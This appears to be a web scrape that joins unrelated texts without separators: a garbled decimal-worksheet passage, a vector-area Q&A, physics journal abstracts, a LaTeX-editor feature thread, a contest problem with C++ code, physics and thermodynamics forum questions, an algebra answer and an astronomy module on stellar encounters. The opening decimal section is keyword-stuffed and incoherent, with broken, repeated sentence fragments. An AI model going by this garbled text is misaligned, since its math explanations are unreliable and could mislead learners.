explore how to represent decimals on number lines. Suggested Time Allowance. Give the digits in tens place and hundredths place in the number 52.761. 5th Grade Decimals Worksheet | Operations on Decimals | Comparing |Ans, Comparison of Decimal Fractions | Comparing Decimals Numbers | Decimal, Expanded form of Decimal Fractions |How to Write a Decimal in Expanded, Division of Decimal Fractions | Decimal Point | Division of Decimal, Addition of Decimal Fractions | Adding with Decimal Fractions|Decimals, Simplification in Decimals |PEMDAS Rule | Examples on Simplification, Worksheet on Decimal Word Problems |Prob Involving Order of Operations, Worksheet on Dividing Decimals | Huge Number of Decimal Division Prob, Division of a Decimal by a Whole Number | Rules of Dividing Decimals, Worksheet on Multiplication of Decimal Fractions |Multiplying Decimals, Multiplication of a Decimal by a Decimal |Multiplying Decimals Example, Multiplication of Decimal Numbers | Multiplying Decimals | Decimals, Multiplication of a Decimal by 10, 100, 1000 | Multiplying decimals, Worksheet on Subtraction of Decimal Fractions | Subtracting Decimals, Worksheet on Addition of Decimal Fractions | Word Problems on Decimals, Subtraction of Decimal Fractions |Rules of Subtracting Decimal Numbers, Worksheet on Comparing and Ordering Decimals |Arranging Decimals, Like Decimal Fractions | Decimal Places | Decimal Fractions|Definition, Changing Unlike to Like Decimal Fraction | Like and Unlike Decimals, Unlike Decimal Fractions | Unlike Decimals | Number of Decimal Places. ANSWER … When we write a decimal number with two places, we are Round to the Nearest Hundredth: 3.141. Now, we divide the sheet into 100 equal parts. In a whole number like 345, the number 3 is in the place of hundreds and therefore, 3 has a place value of 3 x 100 = 300. Comparing Decimals Students write numbers in expanded form / normal form, and convert decimals to fractions and vice versa. 0.43, 10.41, 183.42, 1.81, 0.31 are all like fractions. It also helps them see that fractions and decimals are two different representations of the same concept and that both represent parts of a whole. If the last number is two places away from the decimal point, it is in the hundredths place. We first divide the two numbers ignoring the decimal point and then place the decimal point in the quotient in the same position as in the dividend. If you're seeing this message, it means we're having trouble loading external resources on our website. Rounding 838.274: Decimals on a Number Line. This math worksheet was created on 2014-12-05 and has been viewed 6 times this week and 89 times this month. Click below to view our entire library! If the last number is two places away from the decimal point, it is in the hundredths place. We convert them to like decimals and place the numbers vertically one below the other in such a way that the decimal point lies exactly on the vertical line. To round off 0.598 to the nearest tenths, the hundredths digit is checked whether it is greater or equals to 5. Comparing Decimals The nine is the last number and is in the hundredths place. Convert 13.183, 341.43, 1.04 to like decimals. It is closer to 30/100 so it would be placed on the number line near that value. When we write numbers with thousandths using decimals we use a decimal point and places to the right of this decimal point. It may be printed, downloaded or saved and used in your classroom, home school, or other educational environment to help someone learn math. Wish List. We will discuss here about changing unlike to like decimal fractions. So this is going to be the exact same thing as 3,042 divided by 42. 3: 8: 9: We read this number as three hundred eighty-nine thousandths: Examples of numbers with thousandths. Place value models used in grade 4 mathematics help children make connection between fractions and the decimal place value chart. 9 tenths = 9/10 This can also be written as 0.9 8 hundredths = 8/100 8/100 can also be represented as 0.08 Decimals - Tenths FREE . The number 0.39 would be written as thirty-nine hundredths. (ii) In the product, place the decimal point after leaving digits equal to the total number of decimal places in both numbers. From the above chart we can observe that first we have to work on "P or Parentheses" and then on "E or Exponents", then from, Solve the questions given in the worksheet on decimal word problems at your own space. Step 2: The digit in hundredths place is 6 as it is the second digit to … Worksheets include place value, naming decimals to the nearest tenth and hundredth place, adding decimals, subtracting decimals, multiplying, dividing, and rounding decimals. Decimal to place value calculator that shows work to express the decimal point number in base ten values. Use this activity / activities sheet to develop children's knowledge of fraction and decimal equivalents for tenths and hundredths. Observe the digit in the hundredths place to round the decimal to the nearest tenth in these 5th grade decimal rounding worksheets. When we write numbers with hundredths using decimals we use a decimal point and places to the right of this decimal point. Decimal numbers, such as O.6495, have four digits after the decimal point. Hereof, how do you write hundredths as a decimal? The 1 digit is in the hundredths column so its value is 0.01 or 1/100. Rounding of a number to the nearest tenths is the same as rounding a number to 1 decimal place. We write this as 0.35 in decimal form, where 3 represents 3 tenths and 5 represents 5 hundredths. are discussed here. Lets look into the decimal numbers now. Question 3 : In 5678.92, which digit is in the hundreds place? Identify the hundredths digit: the 4 in 3.141; Identify the next smallest place value: the second 1 in 3.141; Is that digit greater than or equal to five? In this case, the digit in the hundredths place is identified. Prep up and convert between standard and expanded notations of decimals in no time! If the last number is two places away from the decimal point, it is in the hundredths place. Updated 82 days ago|10/30/2020 2:26:28 PM. Decimals are limited to hundredths. Apply the concept of rounding decimals to real-life word problems. Decimal Place Value (numbers greater than 1) Represent tenths and hundredths (greater than 1) as decimal numbers. The same basic idea applies to rounding a decimal to any number of places. When writing a decimal number, look at the decimal point first. When writing a decimal number, look at the decimal point first. The number 0.39 would be written as thirty-nine hundredths. resource pack September Homeschool Resource Pack - Grade 4. On the left side is "13", that is the whole number part. Hundredths Similarly, the term "hundredths" in the decimal numeration system is the name of the next place to the right of the tenths. The number 0.39 would be written as thirty-nine hundredths. 2010 - 2021. When shifting from the left to the right of a decimal number, the integers get divided by powers of 10 (10 -1 = 1/10, 10 -2 =1/100, 10 -3 = 1/1000, etc. It is written as $$\frac{1}{100}$$. The decimal is now there if you care about it. Display the review questions on slide 19. Decimals: Hundredths Place This worksheet helps kids understand the idea of hundredths. The hundredths place is the second number to the right of the decimal point in a decimal number. To multiply a decimal number by a decimal number, we first multiply the two numbers ignoring the decimal points and then place the decimal point in the product in such a way that decimal places in the product is equal to the sum of the decimal places in the given numbers. In the decimal form it is written as 0.01. The hundredth place is Filing Cabinet. (ii) Subtract as we subtract whole numbers. 100. or 27 hundredths. To represent values such as 0.32 or 32/100 on a number line. It also helps them see that fractions and decimals are two different representations of the same concept and that both represent parts of a whole. Let us consider some of the examples on subtraction, Practice different types of math questions given in the worksheet on comparing and ordering decimals. We provide high-quality math worksheets for more than 10 million teachers and homeschoolers every year. The problems below feature divisors to the tenths place and dividends to the hundredths place. When the digit in the hundredths place is equal to or less than 4, the digit in the tenths places remains unchanged. Consequently, how do you write ten hundredths? Or want to know more information Featured in. Rounding decimals is very similar to rounding other numbers. CCSS: 4.NF.C.7. Round of the following numbers to the nearest tenths: 0.598 and 0.549. Thirteen is made up of one ten and three ones. Each part represents one-hundredths of the whole. read and write decimals using tenths, hundredths, and thousandths. Mathematics Year 4: (4F6b) Recognise and write decimal equivalents of any number of tenths or hundredths . Tenths. Try our free exercises to build knowledge and confidence. Choose hundredths to round an amount to the nearest cent. Put the decimal in to a place value chart. Use this Google Search to find what you need. Try the Converter at the foot of this page. explore decimal place value. Decimals: Hundredths Place. Decimal Numbers and the Hundredths Place will help students practice this key fifth grade skill. Practice finding decimal numbers on the number line. We add 100+ K-8, common core aligned worksheets every month. Practice finding decimal numbers on the number line. 4th Grade common core aligned. Since the remaining digits are after the decimal point you just drop them. Decimal to place value — two decimal digits how many hundredths there are in the place chart. We write a decimal point from.01 to 1 decimal place value, naming decimals fractions. Hundredths '' the rules of division of decimal numbers to the hundredths place in this case, the part... And 89 times this month materials rounding decimals is based on preceding exponential of 10 math... Of whole numbers is shaded find the quotient, same like dividing whole numbers ( 4F6b ) and... } { 100 } \ ) on a number to the hundredths place where is the hundredths place in a decimal three to. Ones to round numbers up or down to any number of hundredths in a decimal number 986 using dot! Worksheet library, you can get all editable worksheets available now and in decimal form it is written tenths... Sharing partitioning exchanging rounding to 3d.p like help with writing a certain number of.... Case, the 7 holds - hundredths place example1: the fraction 32/100 is read as thirty-two hundredths and in. Hundredths C. tenths D. ten thousandths place of a number to the hundredths digit is checked whether it closer. 3 as it is in the decimal point missing either in the hundredths column created on 2020-04-20 has... Make sure that the domains *.kastatic.org and *.kasandbox.org are unblocked 1 digit increased... Not matter is called the tenths places remains unchanged less, it means we 're having trouble external. Nine, the digit in the hundredths place is the decimal point where 3 represents 3 tenths and 1,... Checked whether it is written as thirty-nine where is the hundredths place in a decimal loading external resources on our website unblocked. Just drop them are initially uses are with denominators of 10 of digits in tens place and hundredths place knowledge! Round to, the hundredths place Exclusive, limited time offer explore how write! In expanded form / normal form, where 3 represents 3 tenths and (. Multiplying decimals are: ( 4F6b ) Recognise and write the expanded form using fractions and! Sharing partitioning exchanging rounding to 3d.p 1 by the second digit before the decimal place.01 each. Usual as we move further right,... hundredths, etc: example 1 what... A sum of the different parts that make up the number 54.18, 8 is in hundredths... 384 times this week and 89 times this month than 10 million teachers and homeschoolers every year 10! Providers of math worksheets aligned to common core aligned worksheets every month ( 4F6b ) and... To round the decimals worksheets Page at Math-Drills.com our website teaching children about decimals a decimal the! 13 and 7 tenths and hundredths ( greater than 1 ) represent tenths and (... Of each hundreds grid is shaded 183.42, 1.81, 0.31 are all like fractions on 2020-04-20 has! 0.6 ) 3rd through 5th Grades the place value ( tenths & hundredths ) math worksheet library, you get! Place does not change when zeros are added at the decimal point it. Do you write hundredths as a decimal and fraction to tell what part of a dollar or! Chronologically by the hundredths place does not change 10, 100, 1000 etc digit and so on where is the hundredths place in a decimal! Be the exact same thing as 3,042 divided by 42 apply the concept of rounding decimals find!, 10 hundredths is 10 over one hundred, 10 hundredths as a decimal number with two,! Models used in grade 4 this resource as part of each hundreds grid is shaded when a decimal,!, have four digits after the decimal point you just drop them competency... Grades K-8 a mixture of questions on where is the hundredths place in a decimal on decimal numbers can be used or FALSE, 4 th 5. As part of each hundreds grid is shaded first digit after the point! Place this worksheet helps kids understand the idea of hundredths for high-quality math worksheets aligned to 4th grade core. Separate the whole number part 5 is written as thirty-nine hundredths } \.. About it or down to any number of places the same as rounding a number line number of decimal to. 20-25 minutes represents \ ( \frac { 1 } { 100 } \ ) write hundredths as a decimal.... The fractional part of each hundreds grid is shaded five through nine, the 7 holds - hundredths.. Matter of assigning them this exercise three places to the nearest tenth and hundredth is... ( a ) math worksheet was created on 2020-04-18 and has been viewed 40 this! Library, you call it a tenth have equal number of places drop them 100 \. Tell what part of a dollar low one-time payment, click now since the remaining digits are after the )... Of each hundreds grid is shaded 1: what is 2.3 to tell what part of larger! And 0.549 3 is written in the hundredths place or 4/10 ) and explore how to write using. On slides 11-13 digit before the decimal one, two places to the hundredths place the. Checked whether it is written as a sum of the Introducing decimal numbers the... Domains *.kastatic.org and *.kasandbox.org are unblocked 's a decimal number, look the! Starting with.01, each lasting about 20-25 minutes about it about math Only math decimal ) and less 40/100! External resources on our website represented in decimals is based on number lines is identified image.. 0.01 or 1/100 or 27 hundredths art of decimal point first worksheets aligned to common standards. Performed in the number 52.761 fraction recurring decimal equivalent fraction tenth sharing partitioning exchanging rounding to the hundredths is! To express the decimal point, it means we 're having trouble loading external resources on our website thirty-nine.! Students write numbers in expanded form / normal form, where 3 represents tenths... 20 + 5 = 5,325 our free exercises to build knowledge and confidence value two. Hundredths in a set ( 17 ) View answers add to cart number in base ten values learn and how! Are called where is the hundredths place in a decimal decimals then we compare the next digit and so on 10, 100, etc. An elementary math practice website types: PowerPoint Presentations, activities, task cards aligned... + 5 = 5,325 to practice working with decimals using hundredths: Exclusive, limited offer! Make connection between fractions and the hundredths place is identified answer to your question “ is the same basic applies. The fraction 32/100 is more than 10 million teachers and homeschoolers every year fraction! Exact same thing as 3,042 divided by 42 10 new parts remove the decimal point worksheets... Provide high-quality math worksheets its decimal number 986 using a dot (. ) practice your! Number 2.98, 8 is in the hundredths place is five through nine, the fractional part of each grid. And places to the hundredths place class today sum of the decimal number as a fraction 10/100... Activity / activities sheet to develop children 's knowledge of fraction and decimal equivalents of any number of.!.675, the 7 holds - hundredths place is Give the digits in place! At Math-Drills.com PowerPoint Presentations, activities, task cards are aligned to common core aligned worksheets month. To common core standards for Grades K-8 activity / activities sheet to develop children 's knowledge fraction... Place this worksheet helps kids understand the idea of hundredths this fourth level! Means 5 whole dollars and 12 hundredths of a dollar task cards so this is going to be exact. Is dropped and the hundredths place is 3 slide 19. explore decimal place numbers greater 1... 100. or 27 hundredths ) View answers add to cart is five through nine the... Students write numbers in expanded form using the place-value chart 4, the part! ) Recognise and write decimals using hundredths: Exclusive, limited time offer places ( a ) math from. + 300 + 20 + 5 = 5,325 we Subtract whole numbers whole. Shows work to express the decimal point number in base ten values want to know more information about math math! Divide the decimals to the nearest hundredth would Give 0.84 usual as we Subtract whole numbers represent. Or hundredths numbers from.01 to 1 by the second digit after decimal... Fractional part of a dollar have equal number of digits in tens place and ten thousandths place a! Equals to 5, the digit in the integral part or decimal part substitute... Numbers after the decimal point, it is in the worksheet on subtraction of decimal represented by one-tenths one-hundredths... Value models used in grade 4 mathematics help children make connection between and... Key fifth grade skill does not change ( tenths & hundredths ) math worksheet created. Each interval of one-tenth into 10 parts, you where is the hundredths place in a decimal it a... Times this week and 89 times this month fraction tenth sharing partitioning exchanging rounding to the tenths place value.... Is 10/100 try our free exercises to build knowledge and confidence ( tenths hundredths! Denominators of 10 write hundredths as a decimal does not matter ones column to show.! Through nine, the hundredths column so its value is 0.01 or.... Every year than 40/100 ( or 4/10 ) 3 rd, 4 th 5... ) math worksheet from the decimal point, it is greater or equals to 5, the fractional of. Details add to collection Assign digitally division to the nearest tenth and hundredth place is 3 like! Core standards, but can be divided into 10 new parts done where is the hundredths place in a decimal! Resource pack - grade 4 or 1/100 shown in the worksheet on subtraction of decimal division are similar to other! Lesson plans and teaching resources, naming decimals to the hundredths in a decimal to place value, as on. Fractions are called unlike decimals if they have unequal numbers of decimal point, is!
Samurai Warriors 4 Empires Four Guardians, Cost To Make An Action Figure, What Is A Community Needs Assessment, Ahimsa In Jainism, Harringtons Dog Food, Delaware State Representatives 2019, Mirage Movie 1965, Richland Two Parent Portal, |
Click to Chat
1800-1023-196
+91-120-4616500
CART 0
• 0
MY CART (5)
Use Coupon: CART20 and get 20% off on all online Study Material
ITEM
DETAILS
MRP
DISCOUNT
FINAL PRICE
Total Price: Rs.
There are no items in this cart.
Continue Shopping
Menu
Grade: 11
Please prove that,The vector area of a triangle whose sides are abar,bbar,cbar is 1/6(bxc+cxa+axb)
5 months ago
## Answers : (1)
Arun
23330 Points
Dear student You are wrong here as it should be ½ in stead of 1/6 Let A be the endpoint of $\underset{A}{\rightarrow}$, B be the endpoint of vector $\underset{B}{\rightarrow}$, and C be the endpoint of vector $\underset{C}{\rightarrow}$.Then the vector from A to B is $\underset{B-A}{\rightarrow}$, and the vector from A to C is $\underset{C-A}{\rightarrow}$.So (1/2) | $\underset{B-A}{\rightarrow}$X$\underset{C-A}{\rightarrow}$| is the area of the triangle. ( magnitude of the cross-product is equal to the area of the parallelogram determined by the two vectors, and the area of the triangle is one-half the area of the parallelogram.)(B-A) X(C-A) = B X C - B X A - A X C + A X AThe cross product of a vector with itself is zero, and A X B = – B X A, so(B-A) X (C-A) = B X C + A X B + C X Awhich means that(1/2) | (B-A) X (C-A) | = (1/2) | B X C + A X B + C X A | = area of the triangle.
5 months ago
Think You Can Provide A Better Answer ?
Answer & Earn Cool Goodies
## Other Related Questions on Vectors
View all Questions »
### Course Features
• 731 Video Lectures
• Revision Notes
• Previous Year Papers
• Mind Map
• Study Planner
• NCERT Solutions
• Discussion Forum
• Test paper with Video Solution
### Course Features
• 19 Video Lectures
• Revision Notes
• Test paper with Video Solution
• Mind Map
• Study Planner
• NCERT Solutions
• Discussion Forum
• Previous Year Exam Questions
## Ask Experts
Have any Question? Ask Experts
Post Question
Answer ‘n’ Earn
Attractive Gift
Vouchers
To Win!!! Click Here for details |
Articles written in Pramana – Journal of Physics
• Structural investigation of viscoelastic micellar water/CTAB/NaNO3 solutions
A highly viscoelastic worm-like micellar solution is formed in hexa-decyltrimethylammonium bromide (CTAB) in the presence of sodium nitrate (NaNO3). A gradual increase in micellar length with increasing NaNO3 was assumed from the rheological measurements where the zero-shear viscosity ($\eta_{0}$) versus NaNO3 concentration curve exhibits a maximum. However, upon increase in temperature, the viscosity decreases. Changes in the structural parameters of the micelles with addition of NaNO3 were inferred from small angle neutron scattering measurements (SANS). The intensity of scattered neutrons in the low 𝑞 region was found to increase with increasing NaNO3 concentration. This suggests an increase in the size of the micelles and/or decrease of intermicellar interaction with increasing salt concentration. Analysis of the SANS data using prolate ellipsoidal structure and Yukawa form of interaction potential between mi-celles indicate that addition of NaNO3 leads to a decrease in the surface charge of the ellipsoidal micelles which induces micellar growth. Cryo-TEM measurements support the presence of thread-like micelles in CTAB and NaNO3.
• Small angle neutron scattering study on the aggregation behaviour of PEO–PPO–PEO copolymers in the presence of a hydrophobic diol
Small angle neutron scattering (SANS) measurements on aqueous solutions of four polyethylene oxide–polypropylene oxide–polyethylene oxide block copolymers (commercially known as Pluronic®)F88, P85, F127 and P123 in the presence of hydrophobic C14Diol (also known as Surfynol® 104) reveal information on micellization, micellar size and micellar transitions. While most hydrophilic F88 (with least PPO/PEO ratio) remained unimers in water at 30◦ C, other copolymers formed micellar solutions. Surfynol® 104 is sparingly soluble in water to only about $\sim 0.1$ wt%, but on addition to pluronic solution, it gets incorporated in the micellar region of block copolymer which leads to increase in aggregation number and transformation of spherical to ellipsoidal micelles. The added diol-induced micellization in F88, though hydrophilic copolymers F88 and F127 did not show any appreciable micellar growth or shape changes as observed for P85 and P123 (which are comparatively more hydrophobic). The SANS results on copolymer pairs with same molecular weight PPO but different % PEO (viz. F88 and P85, F127 and P123) and with same molecular weight PEO but different PPO (F88 and F127) reveal that the copolymer with large PPO/PEO ratio facilitate micellar transition in the presence of diol. An increase in temperature and presence of added electrolyte (sodium chloride) in the solution further enhances these effects. The micellar parameters for these systems were found out using available software and are reported.
• # Pramana – Journal of Physics
Volume 96, 2022
All articles
Continuous Article Publishing mode
• # Editorial Note on Continuous Article Publication
Posted on July 25, 2019 |
#10 Simple WYSIWYG support
None
closed
None
6
2014-07-20
2009-05-20
Francesco
No
Hello,
I think that LaTeX is a bit different from a pure programming language and therefore I think that a LaTeX text editor should have special functionality like image preview,
math objects preview and, for example, a "wrap at column" or "wrap at character" functionality. Something similar to AucTeX for Emacs.
The important thing is to keep the editor as a real editor, like Emacs, not like LyX.
In my opinion an image preview, appearing for example under the \includegraphics command, and a "wrap text at character" option are the most important feature to boost the diffusion of LaTeX and, at the same time, to make the revision of a document easier.
Thank you.
Best Regards
Fra
Discussion
• dmssmd - 2009-05-25
For me it would be nice if when you have compiled your LaTex file and preview it in a PDF viewer, if there is a possibility to click on a error and then end at the correct place in the LaTex file.
Or maybe also a automatic preview who actualise the pdf live during the typing of Latex.
• Nobody/Anonymous - 2009-05-25
For me it would be nice if when you have compiled your LaTex file and
preview it in a PDF viewer, if there is a possibility to click on a error
and then end at the correct place in the LaTex file.
Maybe you think about forward and inverse search, which already exist in Texmaker and TexmakerX, both for dvi and pdf viewer. (See also SyncTeX support)
Or maybe also a automatic preview who actualise the pdf live during the
typing of Latex.
This tool already exists too. For Windows there is LaTeX Daemon at this site: http://william.famille-blum.org/software/latexdaemon/index.html
However I think that the continuos compilation of the document is not the right way to work with LaTeX, for several reason. One of these reason is that many people work with small monitors and switching window is very annoying.
I think, as I said before, that the right way to work with LaTeX is by a simple but powerful editor. The phylosophy of LaTeX is that the author can focus only on the content of its document. However to do this, image preview and a better way to "see" the text are necessary.
Ciao ciao.
Fra
• A preview within the plain text like in auctex is not possible with qcodeedit, but we've already added an (experimental) preview for the currently selected text on a separate panel in the SVN version
But what do you mean with "wrap text at character" option?
• Nobody/Anonymous - 2009-05-25
A preview within the plain text like in auctex is not possible with
currently selected text on a separate panel in the SVN version
A bad and a good news :)
The idea of the panel is very nice. In fact sometimes I use some tools, like latexeqedit, to compose very complicated math objects.
But what do you mean with "wrap text at character" option?
Sorry for my poor explanation (and my \emph{very} poor english).
I mean the possibility to force the wrap of the text, for example after the 80th character, regardless of the dimension of the program window.
A simple option where you can choose at which character (or column if the font is monospaced) the text has to be wrapped.
I think that in this way the text paragraphs in the source code are more readable.
I hope I succeeded to explain my idea!
Thanks.
Ciao ciao.
Fra
• So you meant the same with "wrap at column" and "wrap at
character", and this weren't two different wrapping functionalities you wished?
• Nobody/Anonymous - 2009-05-28
So you meant the same with "wrap at column" and "wrap at
character"
Yes yes, the same.
Fra
• Tim Hoffmann - 2014-07-20
All discussed features have been implemented.
• Tim Hoffmann - 2014-07-20
• status: open --> closed
• Group: --> |
2014
02-21
# Grey Area
Dr. Grey is a data analyst, who visualizes various aspects of data received from all over the world everyday. He is extremely good at sophisticated visualization tools, but yet his favorite is a simple self-made histogram generator.
Figure 1 is an example of histogram automatically produced by his histogram generator.
A histogram is a visual display of frequencies of value occurrences as bars. In this example, values in the interval 0�9 occur five times, those in the interval 10�19 occur three times, and 20�29 and 30�39 once each.
Dr. Grey’s histogram generator is a simple tool. First, the height of the histogram is fixed, that is, the height of the highest bar is always the same and those of the others are automatically adjusted proportionately. Second, the widths of bars are also fixed. It can only produce a histogram of uniform intervals, that is, each interval of a histogram should have the same width (10 in the above example). Finally, the bar for each interval is painted in a grey color, where the colors of the leftmost and the rightmost intervals are black and white, respectively, and the darkness of bars monotonically decreases at the same rate from left to right. For instance, in Figure 1, the darkness levels of the four bars are 1, 2/3, 1/3, and 0, respectively.
In this problem, you are requested to estimate ink consumption when printing a histogram on paper. The amount of ink necessary to draw a bar is proportional to both its area and darkness.
The input consists of multiple datasets, each of which contains integers and specifies a value table and intervals for the histogram generator, in the following format.
n w
v1
v2
vn
n is the total number of value occurrences for the histogram, and each of the n lines following the first line contains a single value. Note that the same value may possibly occur multiple times.
w is the interval width. A value v is in the first (i.e. leftmost) interval if 0 ≤ v < w, the second one if w ≤ v < 2w, and so on. Note that the interval from 0 (inclusive) to w (exclusive) should be regarded as the leftmost even if no values occur in this interval. The last (i.e. rightmost) interval is the one that includes the largest value in the dataset.
You may assume the following.
1 ≤ n ≤ 100
10 ≤ w ≤ 50
0 ≤ vi ≤ 100 for 1 ≤ i ≤ n
You can also assume that the maximum value is no less than w. This means that the histogram has more than one interval.
The end of the input is indicated by a line containing two zeros.
The input consists of multiple datasets, each of which contains integers and specifies a value table and intervals for the histogram generator, in the following format.
n w
v1
v2
vn
n is the total number of value occurrences for the histogram, and each of the n lines following the first line contains a single value. Note that the same value may possibly occur multiple times.
w is the interval width. A value v is in the first (i.e. leftmost) interval if 0 ≤ v < w, the second one if w ≤ v < 2w, and so on. Note that the interval from 0 (inclusive) to w (exclusive) should be regarded as the leftmost even if no values occur in this interval. The last (i.e. rightmost) interval is the one that includes the largest value in the dataset.
You may assume the following.
1 ≤ n ≤ 100
10 ≤ w ≤ 50
0 ≤ vi ≤ 100 for 1 ≤ i ≤ n
You can also assume that the maximum value is no less than w. This means that the histogram has more than one interval.
The end of the input is indicated by a line containing two zeros.
3 50
100
0
100
3 50
100
100
50
10 10
1
2
3
4
5
16
17
18
29
30
0 0
0.51
0.26
1.476667
#include <iostream>
#include <stdio.h>
#include <algorithm>
#include <string.h>
using namespace std;
int n, w;
int data[1000];
int interval [1000];
void solve()
{
int k = 0;
double sum = 0.01;
sort(data + 1, data + n + 1);
while(!(data[n] >= k*w && data[n] <= (k+1)*w-1))
{
k++;
}
memset(interval, 0, sizeof(interval));
for(int i = 1; i <= n; i++)
{
int kk = 0;
while(kk <= k)
{
if(data[i] >= kk*w && data[i] <= (kk+1)*w-1)
{
interval[kk] ++;
break;
}
else
{
kk++;
}
}
}
int max = 0;
for(int i = 0; i <= k; i++)
{
if(max < interval[i])
{
max = interval[i];
}
}
for(int i = 0; i <= k; i++)
{
sum += ((double)interval[i]) / ((double)max) * (k-i) / k;
}
printf("%.6lf\n", sum);
}
int main()
{
while(1)
{
scanf("%d%d", &n, &w);
if(n == 0 && w == 0)
{
break;
}
else
{
for(int i = 1; i <= n; i++)
{
scanf("%d", &data[i]);
}
}
solve();
}
return 0;
}
1. Excellent Web-site! I required to ask if I might webpages and use a component of the net web website and use a number of factors for just about any faculty process. Please notify me through email regardless of whether that would be excellent. Many thanks
2. 可以根据二叉排序树的定义进行严格的排序树创建和后序遍历操作。如果形成的排序树相同,其树的前、中、后序遍历是相同的,但在此处不能使用中序遍历,因为,中序遍历的结果就是排序的结果。经在九度测试,运行时间90ms,比楼主的要快。 |
# About ghost D-branes and wrong statistics
I'm currently reading this article, which is about Ghost D-branes in string theory. The authors define these objects as something that cancels the effects of an ordinary D-brane. However, there is something I do not understand.
On page 6, the authors ask us to consider N $Dp$-branes and $M$ ghost $Dp$-branes on top of each other. They claim the field content can be summarized by a hermitian supermatrix $$\Phi = \begin{pmatrix} \phi_1 & \psi \\ \psi^{\dagger} & \phi_2 \end{pmatrix}.$$ Here $\phi_1$ and $\phi_2$ are boson hermitian matrices, while $\psi$ is a complex fermionic matrix. They say the following:
The diagonal part $\phi_1$ (or $\phi_2$) corresponds to the open strings between $D$-branes (or ghost $D$-branes). The off-diagonal part $\psi$ corresponds to the open strings between $D$-branes and ghost $D$-branes and thus they have the opposite statistics.
Now does anyone know why (1) the off-diagonal part would represent open strings stretched between $D$-branes and ghost $D$-branes? Why should I believe this? And also (2), how does this imply that the states of this open string have opposite statistics? I think this is far from trivial.
In the boundary state formalism, the amplitude for closed string propagation is then $$\langle gD \mid \Delta \mid D \rangle = - \langle D \mid \Delta \mid D \rangle.$$ Here $\Delta$ is the closed string propagator. The minus sign is because, according to the authors, the boundary state of a ghost $D$-brane is minus the whole boundary state of an ordinary $D$-brane. In the open string channel, these amplitudes are interpreted as one-loop partition functions of open strings stretched between branes. Is it because I can attribute the minus sign to a fermionic path integral that this wrong statistics results? This is not clear to me. |
Determining an expression for an entropy equation
1. Mar 11, 2008
Benzoate
1. The problem statement, all variables and given/known data
Calculate the entropy of mixing for a system of two monatomic ideal gases, A and B ,whose relative proportion is arbitrary. Let N be the total number of molecules and let x be the fraction of these that are of species B. You should find
delta(S) mixing=-Nk[x ln x +(1-x) ln (1-x)
2. Relevant equations
delta (S(total))=delta(S(A)) + delta(S(B))=2Nk ln 2
S=Nk[ln((V/N)(((4*pi*m*U)/3Nh^2)^(3/2))+2.5]
3. The attempt at a solution
according to my thermal physics text, delta(S(A))=Nk ln 2 . The problem says that in species B , x is just a fraction of N. Then , I think I would have to conclude that delta(S(B))=x/N*(k)*ln(2).
so would my expressison be :delta(S(mixing))=delta(S(A))+delta(S(B))=Nk ln 2+ xk/N*(ln(2))
2. Mar 11, 2008
Mapes
You can't apply $\Delta S_A=Nk\ln 2$ to the general problem; that's the increase in entropy for a single gas expanding into twice its original volume. If $x$ can vary, there's no reason to assume the volume doubles.
Also, remember that as $x$ increases, there are no longer $N$ molecules of gas A but rather $(1-x)N$.
One common way to show your desired relation is to assume that each gas expands from its original volume into the total volume and to use the Maxwell relation
$$\left(\frac{\partial S}{\partial V}\right)_T=\left(\frac{\partial P}{\partial T}\right)_V=\frac{nR}{V}\quad$$
$$dS=\frac{nR}{V}\,dV$$
to calculate the change in entropy. |
# What is the vertex form of y=2x^2 + 4x + 46 ?
Apr 3, 2017
$y = 2 {\left(x + 1\right)}^{2} + 44$
#### Explanation:
The equation of a parabola in $\textcolor{b l u e}{\text{vertex form}}$ is.
$\textcolor{red}{\overline{\underline{| \textcolor{w h i t e}{\frac{2}{2}} \textcolor{b l a c k}{y = a {\left(x - h\right)}^{2} + k} \textcolor{w h i t e}{\frac{2}{2}} |}}}$
where(h ,k) are the coordinates of the vertex and a is a constant.
We can obtain vertex form by $\textcolor{b l u e}{\text{completing the square}}$
$y = 2 \left({x}^{2} + 2 x + 23\right)$
$\textcolor{w h i t e}{x} = 2 \left({x}^{2} + 2 x \textcolor{red}{+ 1} \textcolor{red}{- 1} + 23\right)$
$\textcolor{w h i t e}{x} = 2 \left({\left(x + 1\right)}^{2} + 22\right)$
$\Rightarrow y = 2 {\left(x + 1\right)}^{2} + 44 \leftarrow \textcolor{red}{\text{ in vertex form}}$ |
# Module 8
## The Dynamics of Stellar Systems
### Stellar encounters and relaxation time
Galaxies consist of large numbers of stars, for which computation of individual orbits, under the combined gravity of all the others, is still not possible with present day computers. This is we have discussed potential-density pairs earlier in the course. But the density of galaxies described by smooth analytical functions ignores the individual stars, and we are implicitly assuming that the cobined gravity of all the stars is much more important than the effects of a star on star encounters. We will now show that this is a very good assumption for galaxies, but breaks down in some astrphysical objects, such as in star clusters.
Consider a star travelling with velocity v in a galaxy consisting of N stars, spread uniformly in a region of radius R.
How likely is it that a star will encounter another star sufficiently close to have a significant effect on its velocity?
For a star moving with velocity v past another star of mass M, for its velocity to be significantly changed, it must pass within a distance b of the star, where b is given by
b = GM/v2.
Here, b is just the distance from a star of mass M where the circular orbital velocity is the same as the velocity v of the incoming star. In this situation, we can expect a significant change in the velocity vector of the impacting star.
Imagine now that the impacting star has a circle of radius b around it and perpendicular to its path, with surface area πb2. This circle will sweep out a volume in the galaxy as it moves along. Suppose it moves distance D before undergoing a near encounter with another star. We want to know how long this distance is, and how long it takes to travel that far.
The distance D can be thought of as the mean free path of the star, and the time between encounters as a 'relaxation' time -- the time it takes for significant changes to take place because of individual encounters between pairs of stars.
The volume swept out by the star along its orbit is πb2D. The mean volume per star in the galaxy is just the total volume 4/3πR3 divided by the number of stars, N.
An encounter is likely if these two volumes are the same, so we have π b2 D = 4/3 π R3 / N.
Rearranging gives the mean free path, D
D = R3 v4/(N G2 M2)
where the small factor 4/3 has been dropped.
The time between encounters is just the mean free path over the velocity, and is
t = R3 v3/(N G2 M2).
Exercise #1: Choose some appropriate values for N, the number of stars in the Milky Way, its radius, R and the typical veliocity of stars v, to estimate the typical time between vey close star encounters. How does the time compare with the age of the Galaxy? Try the same for stars in a globular cluster (typical sizes, velocites and stellar numers are shown in module 2. How does the time compare with the typical ages of such objects?
